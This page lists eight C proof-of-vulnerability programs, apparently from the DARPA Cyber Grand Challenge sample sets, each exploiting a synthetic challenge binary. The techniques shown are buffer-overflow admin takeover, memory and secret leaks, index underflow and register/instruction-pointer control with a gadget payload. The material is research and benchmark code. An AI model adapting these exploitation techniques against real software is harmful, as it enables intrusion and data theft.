コード例 #1
0
ファイル: pov.c プロジェクト: CyberGrandChallenge/samples 
int main()
{
    unsigned char exploit[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0c\"8N";
    char admin_name[] = {12, 34, 56, 78 };
    type2_vals t2;
    type2_negotiate(&t2);
    int secret = 0;

    unsigned char buf[200];
    unsigned short msg_length = 0;
    unsigned short register_user_req = 11382;
    char user_name[] = { 11, 22, 33, 44 };

    //Register first user (this user will have name overwritten)
    transmit_all(STDOUT, &register_user_req, sizeof(register_user_req));
    msg_length = sizeof(user_name);
    transmit_all(STDOUT, &msg_length, sizeof(msg_length));
    transmit_all(STDOUT, user_name, sizeof(user_name));

    //Logout user
    unsigned short logout_req = 8719;
    transmit_all(STDOUT, &logout_req, sizeof(logout_req));

    unsigned short login_req = 8711;
    //Using the login (vulnerable) command overwrite user name of first user
    transmit_all(STDOUT, &login_req, sizeof(login_req));
    msg_length = sizeof(exploit) - 1;
    transmit_all(STDOUT, &msg_length, sizeof(msg_length));
    transmit_all(STDOUT, exploit, sizeof(exploit) - 1);
    msg_length = sizeof(admin_name);
    transmit_all(STDOUT, &msg_length, sizeof(msg_length));
    transmit_all(STDOUT, admin_name, sizeof(admin_name));

    //Now login as the administrator
    transmit_all(STDOUT, &login_req, sizeof(login_req));
    msg_length = sizeof(admin_name);
    transmit_all(STDOUT, &msg_length, sizeof(msg_length));
    transmit_all(STDOUT, admin_name, sizeof(admin_name));
    msg_length = sizeof(admin_name);
    transmit_all(STDOUT, &msg_length, sizeof(msg_length));
    transmit_all(STDOUT, admin_name, sizeof(admin_name));

    unsigned short remote_token_req = 7777;
    unsigned short page_idx = 100;
    transmit_all(STDOUT, &remote_token_req, sizeof(remote_token_req));
    transmit_all(STDOUT, &page_idx, sizeof(page_idx));

    unsigned short exit_server = 9999;
    transmit_all(STDOUT, &exit_server, sizeof(exit_server));
    length_read(STDIN, buf, 24);
    length_read(STDIN, (unsigned char *)(&secret), sizeof(secret));
    type2_submit((unsigned char *)(&secret), sizeof(secret));
    return 0;
}
コード例 #2
0
ファイル: pov1.c プロジェクト: trailofbits/cb-multios 
int main(void) {
    type2_negotiate(&t2_vals);
    protocol_consume_str();

    transmit(STDERR, "1", 1, NULL);
    protocol_send_str("FIND ord('x', 0 - 29881 * 65536 + 74513) FROM x");
    transmit(STDERR, "\n", 1, NULL);
    protocol_with_recv_string(^(uint16 len, char* str) {
        unsigned char* ustr = (unsigned char*)str;
        t2buf[0] = atoi(ustr, len);
    });
コード例 #3
0
ファイル: pov.c プロジェクト: trailofbits/cb-multios 
int main()
{
    type2_vals t2v;
    unsigned char* ScreenBuf[MAX_LINES];
    unsigned LineCnt;

#ifndef DEBUG
    type2_negotiate(&t2v);
#else
    (void)t2v;
#endif

    transmit_all(STDOUT, "l23k", 4);

    send_string(STDERR, "GOING\n");
    LineCnt = ReadScreen(ScreenBuf);
    for (unsigned Index = 0; Index < 64; ++Index)
    {
        send_string(STDERR, "LOOP\n");
        send_string(STDOUT, "0\n");
        LineCnt = ReadScreen(ScreenBuf);
    }

    send_string(STDOUT, "shuf\n");
    LineCnt = ReadScreen(ScreenBuf);
    send_string(STDOUT, "4986\n");
    LineCnt = ReadScreen(ScreenBuf);
    send_string(STDOUT, "4\n");
    LineCnt = ReadScreen(ScreenBuf);
    send_string(STDOUT, "dupr\n");
    LineCnt = ReadScreen(ScreenBuf);


    char* s = (char *)ScreenBuf[LineCnt - 2];
    s = strchr(s, ':');
    s += 2;

    int m = strtol(s, NULL, 10);
    unsigned char secret[4];
    cgc_memcpy(secret, (void *)&m, 4);

    secret[0] ^= 0x14;
    secret[1] ^= 0x15;
    secret[2] ^= 0x16;
    secret[3] ^= 0x17;

    send_string(STDERR, (char *)s);
    send_string(STDERR, "----->\n");
    type2_submit((unsigned char *)secret, 4);
    send_string(STDOUT, "quit\n");
}
コード例 #4
0
ファイル: pov.c プロジェクト: trailofbits/cb-multios 
int main(void) {
  // negotiate
  type2_vals t2vals;
  type2_negotiate(&t2vals);
  
  // perform POV
  char input[11];
  ReceiveFromCB(input, 10);
  char bytes[55] = "ish hostname +p password +l username dump 1128775680 \n";
  //print_integer(bytes + 42, t2vals.region_addr);
  SendToCB(bytes, cgc_strlen(bytes));
  unsigned int i = 0xffffffff;
  SendToCB("quit\n", 5);
  ReceiveFromCB((char *)&i, 4);
  type2_submit((unsigned char *)&i, 4);
  return 0;
}
コード例 #5
0
ファイル: pov.c プロジェクト: trailofbits/cb-multios 
int main()
{
    type2_vals t2;
    unsigned char buf[200];
    int i;
    size_t bytes;

    cgc_memcpy(buf, "\x00\xff""HDR\x05\x00\x00\x00\x01\x00"
                "ALBM\x00\x00\x00\x38\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b""AAAAAAAAAAAA\x20\xc0\x47\x43""CCCCAAAAAAAAAAAA"
                "TITL\x00\x00\x00\x38\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b""AAAAAAAAAAAA\x30\xc0\x47\x43""CCCCAAAAAAAAAAAA\x7f", 140);

    random(buf + 11 + 8 + 24, 12, &bytes);
    random(buf + 11 + 8 + 24 + 16, 16, &bytes);
    random(buf + 11 + 0x40 + 8 + 24, 12, &bytes);
    random(buf + 11 + 0x40 + 8 + 24 + 16, 16, &bytes);

    for (i = 0; i < 139; i++)
    {
        // make sure we didn't introduce any bad chars
        if (i >= 11 + 0x20 && i < 11 + 0x40 && buf[i] < 0x10) buf[i] ^= 0x55;
        if (i >= 11 + 0x60 && i < 11 + 0x80 && buf[i] < 0x10) buf[i] ^= 0x55;
        if (buf[i] == 0x7f) buf[i] = 0x3f;
        if (buf[i] == 0x7e) buf[i] = 0x3e;
    }

    type2_negotiate(&t2);
    transmit_all(STDOUT, buf, 140);
    length_read(STDIN, buf, 0x58);
    length_read(STDIN, buf, 16);
    // buf contains: "Album: ?????????"
    // as long as buf does not contain "Arti", we have won
    for (i = 7; i < 16; i++)
        if (memcmp(&buf[i], "Arti", 4) == 0)
            break;
    if (i == 16)
    {
        type2_submit(buf + 7, 4);
        return 0;
    }

    // we found "Arti", so look some more
    length_read(STDIN, buf, 8);
    type2_submit(buf + 4, 4);
    return 0;
}
コード例 #6
0
ファイル: main.c プロジェクト: trailofbits/cb-multios 
int main()
{
    type2_vals t2;
    type2_negotiate(&t2);

    char *register_player = "1\nPovPlayer, 1\n";
    char *reregister_player = "4\n1\n123456789012345678901234, 1\n";
    char *cgc_exit = "4\n2\n";

    transmit_all(STDOUT, register_player, cgc_strlen(register_player));
    read_until_game_prompt();
    transmit_all(STDOUT, reregister_player, cgc_strlen(reregister_player));

    play_hi_lo(0);

    transmit_all(STDOUT, cgc_exit, cgc_strlen(cgc_exit));
    return 0;
}
コード例 #7
0
ファイル: pov.c プロジェクト: chubbymaggie/cb-multios 
int main(int cgc_argc, char *cgc_argv[])
{
    unsigned char buf[128];
    type1_vals t1;
    cgc_type1_negotiate(0x00ffffff, 0x00ffffff, 5, &t1);
    t1.ipval |= 0x91000000;
    t1.regval |= 0x91000000;

#if 0
    unsigned char data[4];
    type2_vals t2;
    type2_negotiate(&t2);
    /* ... */
    type2_submit(data, 4);
#endif

    // query
    *(unsigned int *)&buf[0] = 36 + 39;
    *(unsigned int *)&buf[4] = 0x367bae4d;

    // exe
    *(unsigned int *)&buf[8] = 0x4E269472;
    *(unsigned int *)&buf[12] = 0x2000;
    *(unsigned int *)&buf[16] = 0x2000;
    *(unsigned int *)&buf[20] = 39;
    *(unsigned int *)&buf[24] = 0x2020;
    *(unsigned int *)&buf[28] = 0;
    *(unsigned int *)&buf[32] = 0x2020;
    *(unsigned int *)&buf[36] = 0;

    // gadget (0x90000101): pop ebx, pop ebp, ret
    cgc_memcpy(&buf[40], "\x81\xec\x94\x80\x01\x00\xc7\x04\x24\x42\x42\x42\x42\x4c\x4c\x4c\x4c\xc7\x04\x24\x41\x41\x41\x41\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\xc7\x04\x24\x05\x01\x00\x90", 39);

    // set ip and ebp
    *(unsigned int *)&buf[49] = t1.ipval;
    *(unsigned int *)&buf[60] = t1.regval;

    cgc_transmit_all(STDOUT, buf, 40 + 39);
    cgc_length_read(STDIN, buf, 4);
    return 0;
}
コード例 #8
0
ファイル: pov.c プロジェクト: trailofbits/cb-multios 
int main(void)
{

#ifndef DEBUG
    xlat_seed("9an538n9av3;5");
#endif

    char buf[1024];
    int secrets = 0x4347c010;
    const char* reg = "charlie" EOT_S;
    const char* sub_self = "s" EOT_S "charlie" EOT_S;
    const char* start_blub = "b" EOT_S;
    const char* read_blubs = "r" EOT_S;

    length_read(0, (unsigned char*)buf, 0x4);
#ifndef TESTING
    unsigned char data[4];
    type2_vals t2;
    type2_negotiate(&t2);
#endif

    send_string(1, reg);
    length_read(0, (unsigned char*)buf, 0x4);
    send_string(1, sub_self);
    send_string(1, start_blub);
    send_string(1, "adf");
    transmit_all(1, &secrets, sizeof(secrets));
    send_string(1, EOT_S);
    send_string(1, read_blubs);

    length_read(0, (unsigned char*)buf, 0x30);
    length_read(0, (unsigned char*)buf, 0x4);
#ifndef DEBUG
    size_t client_0_data = 0xb7e004f8;
#else
    size_t client_0_data = 0xb7e000b8;
#endif
    size_t secret_addr = (*(size_t*)buf) + 44;
    int diff = secret_addr - client_0_data;
    diff /= 4;
    int idx = (2 << 29) - diff;

    _convert_signed(buf, -idx, 10, 0);

    char tosend[1024];
    strcat(tosend, "y");
    strcat(tosend, EOT_S);
    strcat(tosend, "charlie");
    strcat(tosend, EOT_S);
    strcat(tosend, buf);
    strcat(tosend, EOT_S);
    send_string(1, tosend);
    send_string(1, read_blubs);
    const char* cgc_exit = "e" EOT_S;
    send_string(1, cgc_exit);

#ifndef TESTING
    length_read(0, (unsigned char*)buf, 336);
    length_read(0, data, 4);
    type2_submit(data, 4);
#endif

    return 0;
}